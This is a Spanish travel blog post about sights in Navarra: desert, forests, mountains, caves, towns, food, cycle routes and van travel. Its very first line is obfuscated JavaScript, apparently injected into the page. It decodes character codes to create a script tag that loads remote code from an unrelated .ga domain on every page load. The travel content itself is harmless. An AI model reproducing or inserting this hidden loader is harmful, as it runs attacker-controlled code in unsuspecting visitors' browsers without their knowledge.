Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); 🌿 Qué ver en Navarra: Desierto, montaña, ríos, lagos, cuevas- Furgoplan
Descubre Navarra, una provincia en la que perderte por sus paisajes e historia

Descubre Navarra, una provincia en la que perderte por sus paisajes e historia

Ya te digo, que hay mucho que ver en Navarra y para todos los gustos. En este artículo tan largo tienes toda la información para que te hagas a una idea de la riqueza de esta comunidad.

Coge lo que quieras, deja tu pregunta en comentarios o por instagram e intentaremos resolver tus dudas para que disfrutes de nuestra tierra con los tuyos.

La frase supermanida de «Navarra tierra de diversidad» es una verdad como un templo. En la comunidad foral, puedes encontrar diversidad en tantos aspectos que, muchas veces, cuesta creer que hablemos de la misma provincia.

La-cruz-de-urbasa

Ahí voy con ejemplos:

Comer en Navarra, además de un placer puede ser toda una experiencia. Tanto para vegetarianos como para supercarnívoros, las opciones son muchas. La ternera, el cerdo o, incluso, el pato contrastan (o combinan) con la variedad de verduras de calidad que ofrece la comunidad (espárragos, cogollos de Tudela, alcachofas…).

La lengua que hablamos en Navarra, el euskera o el castellano. No te preocupes, si no hablas euskera no tendrás ningún problema para comunicarte, aunque sería genial que aprendieras las palabras básicas porque aquí nos encanta que las personas de fuera se interesen por nuestra cultura. Además, eso es inmersión y conocer realmente un lugar.

Ideología, este tema no quiero tocarlo mucho. Esto es un blog de viajes. Pero sí es cierto que Navarra es una tierra polarizada en cuanto a ideologías se refiere, y eso se refleja muchas veces en la personalidad de las personas que la habitamos. No te cuento más. Ven y descúbrelo por ti mismo/a.

Las fiestas, en estos días en los que deberíamos estar celebrando San Fermín la nostalgia nos invade a los navarros. Personalmente, no me gustan los toros. No he ido nunca, ni iré. Pero las fiestas en Navarra tienen mucho más que eso, nadie puede decir lo contrario.

Por cierto, no somos muy religiosos pero… ¿Sabes que San Fermín no es el patrón de Navarra? ¿Ni de Pamplona? ¿Sabes quienes son? Al final del post te lo cuento 😉

Los paisajes, ay… los paisajes que puedes ver en Navarra son tan variados… A veces nos preguntan por las redes ¿Qué podemos ver en Navarra? y me parece una de las preguntas más difíciles de responder bien. Por eso, en el post de hoy me voy a extender un poco más en explicarte qué podrás ver en Navarra y qué es lo único que no tenemos en nuestra querida comunidad (bueno, igual me he pasado😎)

Qué ver en navarra

Lo que mencionaba en el último punto, hay tanta variedad de paisajes que ver en Navarra que será difícil si tienes que elegir entre unos u otros. Si tienes tiempo, hazte una ruta supercompleta y disfruta de esta tierra de variedad.

 El desierto

Por un lado está el desierto de las Bardenas Reales, al sur de la comunidad foral. Yo no lo conocía mucho y la última vez que estuvimos alucine muchísimo. Veníamos de Suiza y cada día veíamos aviones militares tipo Kazaa, pero lo que vimos en el desierto (que es una zona militar también) nos dejó impactados.

Además del impacto de todos los recursos militares que despliegan. Hay varias rutas que se pueden hacer en bici y en las que disfrutarás de paisajes desérticos a los que no estamos acostumbrados.

Las formaciones de Tierra, la forma que el agua imprime en las mismas. El Bardenas realescolor… los edificios que se desperdigan por las mismas… Además de la extensión que tiene… Es un lugar que bien merece la visita.

La pernocta no está permitida. Y no olvides que es una zona militar.

En el pueblo de Arguedas, muy cercano a la Bardena, hay una área AC que además de tener los servicios básicos de llenado y vaciado, está justo debajo de las curiosas casas cuevas.

Bardenas-Navarra

La selva

La selva de Irati es otro paraíso que hay que ver en Navarra. La Navarra que presume de desierto, también lo hace de selva verde y frondosa, o de paisaje de mil colores en Otoño.

La inmensidad de la selva de Irati y las historias que esconden sus bosques y montes también merece una buena visita. El segundo hayedo- abetal más grande de Europa después de la Selva Negra, si es que ya lo decimos muchas veces ¡No hay que irse tan lejos!

fabrica-armas-orbaizeta
Orbaizeta

A la Selva se puede acceder o bien desde Ochagavía o bien desde Orbaizeta (pueblos de los que te hablo más adelante). Hay que pagar una tasa de mantenimiento y se pueden hacer diversas rutas.

Ambos pueblos son pintorescos y agradecen la visita. En Ochagavía, no hay área AC propiamente dicha pero hay un parking espacioso en la entrada y desde el que se puede visitar el pueblo.

Además en uno de los extremos del pueblo hay un punto de acceso al río (que está helado, pero mola) con baños, merenderos y cesped cuidado.

La Montaña

Este no es el primer post en el que te contamos qué puedes ver en Navarra, de hecho anteriormente publicamos uno en el que te hablabamos del parque natural de Urbasa y Andia. Montañas que nos roban el corazón.

Pero Navarra no solo tiene diferentes parques naturales, montañas como las mayoas, bonitas tanto de lejos como de cerca, o santuarios en lo alto como San Miguel de Aralar.

Navarra, tiene además parte de los Pirineos. Picos de más de 2000 metros como el Ori, o La Mesa de Los Tres Reyes con historias singulares y curiosas sobre estos reyes (el de Francia, el de Navarra y el de Aragón).

Las carreteras que recorren el Pirineo Navarro desvelan paisajes que difícilmente olvidarás. De mil colores en otoño, oscuros en invierno y de un verde salvaje en verano.

Además de los Pirineos, en Navarra hay varias foces. Mal contado y resumiendo, son la senda que ha abierto el río en la roca de la propia montaña a lo largo del tiempo (de mucho tiempo).

Estas formaciones se han transformado en inmensas grietas por las que ahora el río fluye a sus anchas. Además son el hogar perfecto para aves rapaces como el buitre.

Foz-arabayun-Navarra

Los ríos y lagos

El nacedero de Urederra, puede ser uno de los mejores ejemplos de agua paradisiaca que conocemos. Y está aquí mismo. El agua brota desde las entrañas de Urbasa, gélida y de un intenso azul turquesa. El baño no está permitido y hay aque coger cita.

En Navarra, no decimos que tengamos lagos, más bien son pantanos. Tanto en Yesa (que hace frontera con Aragón) como en Alloz, el color de sus aguas te atrapa. El baño está permitido y es el refugio perfecto en verano.

Además los ríos, helados, que nacen en los pirineos también recorren tierras navarras refrescando a paseantes y montañeros.

Cuevas

¿Has oído hablar de las brujas de Zugarramurdi? Pues ni eran malas, ni eran feas, ni estaban lejos. Zugarramurdi es solo uno de los enclaves en los que podemos encontrar una cueva en Navarra. En la localidad vecina de Urdax- Urdazubi, hay otra y muy cerca pero cruzando la muga, se pueden encontrar muchas más.

Además de estas, que pueden ser las más famosas, Urbasa, esconde grandes tesoros en su interior como la cueva de los cristinos. No obstante, te recomendamos que vayas con guía o personal que las conozca porque ya estamos hablando de otro nivel.

Hacer turismo en navarra

Ahora que ya sabes qué puedes encontrar en la naturaleza Navarra, querrás saber si esto es lo único ¿no?

Pues que te va a decir una navarrica. Que no.

Navarra fue un importante reino durante la edad media, con sus costumbres, lengua, reyes e incluso playas.

Si no me crees, pregunta a google.

Esta es una de las razones de que en Navarra pueda hacerse turismo cultural de gran calidad.

No todo es vino y txistorra.

Podrás moverte por ciudades como Pamplona- Iruña, en cuyo casco histórico todavía se señala la separación entre los burgos que conformaban la ciudad, la ciudadela o el mesón del caballo blanco en plena muralla.

Además, al sur, la ciudad de Tudela- Tutera, fundada por musulmanes y en la que convivieron las tres culturas más importantes de la edad media. A orillas del río Ebro y cerca de la Bardena.

Estella- Lizarra al oeste de la provincia, ciudad que acoje a peregrinos que realizan el camino de Santiago. A las faldas de Urbasa, bañado por el río Ega, cuenta con un casco antiguo que rezuma siglos de historia.

Además podrás ver palacios y castillos como el de Olite o San Francisco Javier. Perfectos para visitar con los más pequeños de la casa.

castillo-javier-navarra

¿Qué se come en Navarra?

Como ya te contaba antes, la comunidad foral es paraíso para todo tipo de paladar.

La trucha a la Navarra, pescada en nuestros ríos.

La huerta rivera, que provee de verduras y hortalizas frescas a toda la región es dificilmente igualable. Los esparragos, las alcachofas, las habas, los cogollos de Tudela… Y la calidad, el mimo y el sabor. Insuperables.

Hay diferentes zonas de Navarra en las que disfrutar de una buena cata de vinos, de quesos de montaña o de unas sabrosas txistorras.

No solo eso, en otoño y primavera, los hongos se desperdigan por nuestros montes y su olor invade las fosas nasales de los senderistas.

Y además, que siempre se me olvida, la carne de caballo o las delicatessen derivadas del pato son tradición y podrás encontrarlas en muchos establecimientos.

Qué ver en Navarra con niños

Nosotros no viajamos con niños, pero te dejo una breve lista de los puntos que creo que son perfectos para ellos.

Los castillos

La imaginación de los niños es insuperable, no sé que nos pasa con los años que la vamos perdiendo.

En Navarra castillos también conservados como el de Olite o el de San Francisco Javier (Uno en el extremo oriental y el otro en el extremo occidental) dispararán la imaginación de los más pequeños.

Cuentan historias de principes, reyes, dragones y traiciones, que con una visita guiada nos harán viajar al pasado.

Parques de aventura

Sin contar con aquellos que tienen animales encerrados, a los que no te animo a ir, Navarra tiene muchas opciones en las que divertirse.

En Urbasa, en Bertiz, en Igantzi… además ofrecen una gran variedad de actividades y modalidades de ocio en las que encajan diferentes edades y gustos.

Todo es cuestión de que busques la zona en la que vas a estar y disfrutes de un día divertido en familia.

Pantanos y piscinas naturales

Ya te decía antes, que en Navarra la playa nos la quitaron, pero no por ello vamos a dejar de ponernos a remojo.

Además de los pantanos de Yesa y Alloz, donde por cierto se puede alquilar equipamiento para deportes acuáticos (al menos en el segundo). Los ríos que surcan esta tierra nos dejan pozas y piscinas naturales en las que refrescarnos.

A 10 minutos de Pamplona, puedes refrescarte en la balsa de La Morea, una de las más populares de la región.

En Burgi, pueblo cuya historia confluye con las aguas del río, están preparados para bañarse desde cualquier punto de la calle principal.

La pileta en Tierra Estella, con aguas saladas y una temperatura permanente de 17º, sea cuando sea.

Cerca de Tudela, tienen su propia «playa», la balsa El Pulger. Dónde además de juncos y un buen lugar para el baño, hay gran variedad de especies de aves.

En el pueblo de Uztarroz, el río con el mismo nombre, surte de aguas limpias a la población permitiendo disfrutar de unas piscinas naturales en el propio pueblo.

A los pies de Urbasa, la playa fluvial de Zudaire te permite arrancar de cuajo la espina que se te queda después de visitar el cercano Nacedero de Urederra.

Una ruta por el desierto

¿A quién no le alucina el desierto?

Pues imagínate a un niño.

En la zona hay diferentes empresas que organizan desde paseos en bicicleta, deportes de aventura o visitas guiadas a la Bardena.

También lo puedes hacer por tu cuenta, en una ruta en bici, a pie…  disfrutando de este paisaje desértico tan diferente a lo que conocemos.

Además en esta zona de Navarra se han rodado un montón de películas, hay paseos en los que está señalizado.

Además hay otros carteles informativos que te explican el ecosistema en diferentes puntos de la Bardena, o el centro de información a su entrada.

Otros

La interesante fabrica de armas de Orbaizeta, o la de Eugi que es anterior, es un lugar curioso y con historia para descubrir. Sus arcos sobre el río han sido fotografiados cientos de veces.

El Santuario de San Miguel de Aralar. Un santuario para niños… suena raro. Pero es que además de las visitas que se pueden disfrutar desde lo alto de la montaña, dentro del santuario se oye a un dragón rugir. Tranquilos, está encerrado.

Navarra en Furgoneta o autocaravana

Sí, sí y sí.

Hay restricciones lógicas, como en todas partes, pero muchas localidades tienen áreas para este tipo de turismo nuestro o al menos puntos de vaciado o rellenado.

Nosotros utilizamos la app park4night o furgoperfecto, entre nuestras favoritas y las que nos salvan la vida practicamente a diario.

Restricciones más importantes:

  • No pernoctar en parques naturales o zonas protegidas
  • No pernoctar en zonas militares (como La Bardena, aunque sea tentador)
  • No vaciar aguas en zonas no habilitadas (sí, una obviedad)

Y otras muchas que probablemente si es tu primer viaje en furgo o AC desconozcas. Por eso escribimos un post hace un par de semanas. Y si ese post no es suficiente, contáctanos por instagram y podremos ayudarte.

Visitar Navarra desde la Bici

Navarra es una comunidad que, excepto en puntos más montañosos, está surcada por autopistas y autovías. Dónde los puertos de montaña, aunque duros, tienen sus recompensas.

Al tener vías más grandes y rápidas, normalmente las carreteras nacionales están bastante despejadas y para el ciclista experto no hay mucho problema.

Pero más allá de este tipo de ruta más «pro» hoy te voy a contar que tipo de turismo puedes hacer de forma supersegura con tu bici y, si quieres, con tu familia.

Navarra, tiene una red de vías verdes (antiguas líneas de ferrocarril) por las que circular con la bici es seguro, llano y divertido.

Si no quieres transportar tu propia bici, consulta a ver si puedes alquilar una en las inmediaciones de la vía para disfrutar del tramo que más te apetezca.

Las vías verdes que recorren Navarra

La más corta y que trancurre enteramente por Navarra es la vía verde la Foz de Lumbier, o Vía verde del Irati. Son casi 7 kilómetros que van desde Lumbier hasta Liédena y donde podrás disfrutar de esta maravilla paisajística de la que te he hablado antes.

Vía verde del Bidasoa, une la localidad de Legasa con Irún (Gipuzkoa), y se trataba de un tren que transportaba minerales y metales. Son 35 kilómetros aprox. y se requiere el uso de frontales.

Vía verde del Plazaola, une las localidades de Latasa (cerca de Lekunberri) con Andoain, Gipuzkoa, en un trayecto de apróximadamente 66,5 kilómetros. Se recomienda el uso de frontal e informarse del estado de la vía antes de inicar el recorrido.

Vía verde del Tarazónica, desde la monumental Tudela hasta la aragonesa Tarazona, 22 kilómetros de vía verde en los que recorreremos suaves caminos mientras podemos disfrutar de vistas como las del Moncayo.

Vía verde del Ferrocarril Vasco- Navarro, 76 kilómetros desde Navarra hasta Gipuzkoa, pasando por Vitoria- Gasteiz. Partiendo desde Estella y llegando a Bergara.

Esta Vía verde, transcurre por diferentes tipos de paisajes, en los que podrás además, ver las antiguas estaciones de tren e incluso exposiciones en antiguos vagones.

Esta ruta no tiene todos los túneles adaptados por lo que debes consultar el tramo que quieres hacer porque a veces la alternativa es un complicado ascenso por un puerto de montaña.

En general las vías verdes también pueden hacerse a pie, nos parece que en bici es más adecuado por las distancias y para poder disfrutarlas de forma más completa.

Toma siempre la precaución de consultar la web o llamar a las oficinas de turismo locales para saber si hay tramos cerrados o zonas complicadas.

Lleva agua, frontal y ropa adecuada. No seas cafre. Preparate.

Pueblos que ver en Navarra

He mencionado algunas ciudades anteriormente, pero la verdad es que Navarra además de ciudades con rica historia, está salpicada por pueblos no menos pintorescos.

Voy a empezar por el mío, Altsasu, capital de Sakana. No es especialmente bonito, además de ser el punto perfecto para establecer campo base y realizar muchas excursiones a Urbasa tiene otras cosas que molan.

La ermita de San Pedro, tan importante para nosotros, aparentemente sencilla es el lugar en el que se coronó al primer rey de Navarra, García Ximénez, allá por el año 717.

Muy cerca hay pueblos pequeños y llenos de encanto como Urdiain, cuyas traidiciones compiten en belleza con sus caserones de piedra y su ubicación a los pies de la montaña.

O Arbizu, mi favorito. Con las mejores vistas de la montaña más mágica de la zona Beriain. Pueblo de pelotaris, artistas y cantantes. Sus fiestas dan comienzo al verano en la víspera de San Juan.

Viajando hacia el norte, encontramos toda la comarca del Baztan. No me pidas que elija un pueblo, porque todos merecen una visita. Ya sea por toda la literatura que han inspirado, su rico chocolate a granel, sus casas de piedra o las leyendas de los agotes.

Aquí quiero hacer un inciso, porque seguro que conoces a la inspectora Salazar y las novelas de Dolores Redondo. A través de ellas te acercas a la magia de este valle, pero no son las únicas.

La autora y periodista Navarra, Katrin Pereda, narra en su libro El arbol de las historias vivas la historia de unos peregrinos que transitan el camino de Santiago que recorre este valle, en lugar de la vía tradicional. Si quieres sentir esta tierra, este es tu libro.

A los pies de Los Pirineos, encontrarás pueblos de montaña como Isaba con sus casas recias de piedra y sus calles empedradas y bien conservadas.

Cerca y como entrada a la Selva de Irati, el pueblo de Ochagavía también cuenta con un casco histórico bien conservado y piscinas naturales a las afueras, además de un parking grande en la entrada en el que la pernocta está permitida.

Otra de las entradas a la Selva de Irati, Orbaizeta, además de la fábrica de armas (donde trascurren algunas de las novelas del autor Ibon Martín), cuenta con miradores y carreteras de montaña impresionantes.

Burgi, de cuyo río y playa fluvial ya hemos hablado, con un museo al aire libre sobre las profesiones tradicionales y en el corazón de una foz.

Leitza, donde se han rodado películas por el buen estado de casco antiguo (La buena nueva, Helena Taberna). Pueblo de pelotaris y harrijasotzailes. También tiene el museo de Perurena en el que los txikis se divertirán.

No dejes de visitar Lesaka, con sus casas tradicionales y el río surcando el pueblo. Seguro que lo has visto en alguna película, pista: te han dicho que es Elizondo.

Los pueblos al sur de Urbasa, como puede ser Gares- Puente la Reina, tienen otro color y otro ambiente. Con puentes por los que han pasado miles de peregrinos y cascos históricos por los que pasear es obligado.

En los alrededores de Tierra Estella, podrás encontrar piezas únicas como el monasterio de Irantzu, Eunate, Ujué… Si te gusta el arte románico, esta zona te va a enamorar.

Fiestas y tradiciones navarras

Vaya momento para escribir sobre esto.

Navarra, además de los San Fermines, tiene multitud de tradiciones y fiestas.

Dejaré aquí una promesa de post pendiente, porque este año no podemos disfrutar de ellas.

Para que abras el apetito, te diré que tenemos ferias de artesanía y ganado que se remontan a la edad media.

Carnavales de tradiciones ancestrales y paganas.

Las almadías de Burgi, forma traidiconal de transportar la madera por el río y que todavía muestran los valientes del pueblo una vez al año.

Y mucho más.

2021, que bien te vamos a recibir.

¿Quién es el patrón de Navarra? ¿Y el de Pamplona?

Aunque no seas religioso, tienes curiosidad por saberlo.

¿O ya se te había olvidado?

Probablemente.

El patrón de Navarra es San Francisco Javier, en honor a quien se hacen peregrinaciones hasta su «humilde» castillo.

¿No te parece curioso que un porcentaje bastante alto de la población masculina Navarra se llame Javier o Xabier? Incluso existe la versión en femenino, Javiera.

Aunque San Fermín es el copatrón de Navarra, se lo ha ganado después de tantos años atrayendo a guiris borrachos a las calles de Pamplona durante las primeras semanas de julio.

El día 7 de dicho mes solo es festivo en la capital, el resto nos buscamos la vida para ir entre semana a disfrutar de esta fiesta sin igual.

Por otro lado, el patrón de Pamplona, aunque la mayoría de personas piensen que es San Fermín (y es que parecería una obviedad) no es otro que San Saturnino. La verdad es que, por suerte, este nombre no es tan popular en Navarra como Javier o Fermín.

Pero gracias a este Santo, el calendario pamplonica tiene el 28 de Noviembre marcado en rojo. Pero no solo esto, el día 3 de diciembre es el día de San Francisco Javier, por lo que es festivo en toda la comunidad foral y los días 6 y 8 de diciembre son festivos nacionales.

Así que los afortunados pamplonicas suelen unir estos festivos y se montan un superpuente (que más parece el acueducto de segovia) en el que viajar suele ser superbarato y sin masificaciones.

Bueno y si has llegado hasta aquí, espero que el artículo te haya resultado de utilidad.

Si tienes cualquier duda, no dudes en escribirnos un comentario aquí o en instagram. 

5 1 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x
A %d blogueros les gusta esto: